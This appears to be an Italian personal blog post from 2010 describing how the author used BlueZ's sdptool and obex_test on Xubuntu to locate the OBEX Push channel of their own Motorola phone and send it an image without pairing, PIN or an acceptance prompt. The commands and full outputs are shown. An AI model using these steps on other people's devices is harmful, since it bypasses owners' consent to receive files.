11/06/10

BlueZ e il mio motorola


Ho provato a sfruttare il protocollo "Bluetooth" per accedere senza autorizzazione, quindi il pairing tra due dispositivi, da mio portatile IBM A31 con S.O. Xubuntu 9.04.
Per fare questo ho usato una chiavetta Bluetooth e come software BlueZ.
Di tutto il pacchetto di BlueZ ho utilizzato l'applicativo sdptool e obex_test.




Con sdptool ho fatto una scansione per trovare un apparato (in questo caso il mio V3 Razor) che abbia attivo il "Object PUSH" ; quidi dalla CLI ho usato:
"$ sudo sdptool search OPUSH"

ottenedo questo risultato:

Inquiring ...
Searching for OPUSH on XX:XX:XX:XX:XX:XX ...
Service Name: OBEX Object Push
Service Description: OBEX Object Push
Service Provider: /a/mobile/system/cl.gif
Service RecHandle: 0x10008
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
<b>Channel: 8</b>
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding:    0x6a
base_offset: 0x100
code_ISO639: 0x6672
encoding:    0x6a
base_offset: 0xc800
code_ISO639: 0x6573
encoding:    0x6a
base_offset: 0xc803
code_ISO639: 0x7074
encoding:    0x6a
base_offset: 0xc806
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
Quindi ho scoperto che il mio cellulare ha un mac= XX:XX:XX:XX:XX:XX ed il canale di comunicazione che mi interessa è Channel: 8;
adesso ho le informazioni necessarie per accedere al mio cellulare senza nessun PIN per il paring, mi basta usare il protocollo OBEX in questo modo:

"$ obex_test -b 00:11:22:33:44:55 8"

Ottenendo:
Using Bluetooth RFCOMM transport
OBEX Interactive test client/server.
  >c
Connect OK!
Version: 0x10. Flags: 0x00
  >p
PUT file (local, remote)> /home/manga_mod.jpg manga_mod.jpg
name=/home/manga_mod.jpg, size=12411
Going to send 12411 bytes
Made some progress...
Made some progress...
Made some progress...
PUT successful!
>q
 
In questo modo ho trasferito una mia immagine dal portatile 
al telefono senza nessun PIN e senza che il telefono 
chieda se accetto il file.










Nessun commento:

Posta un commento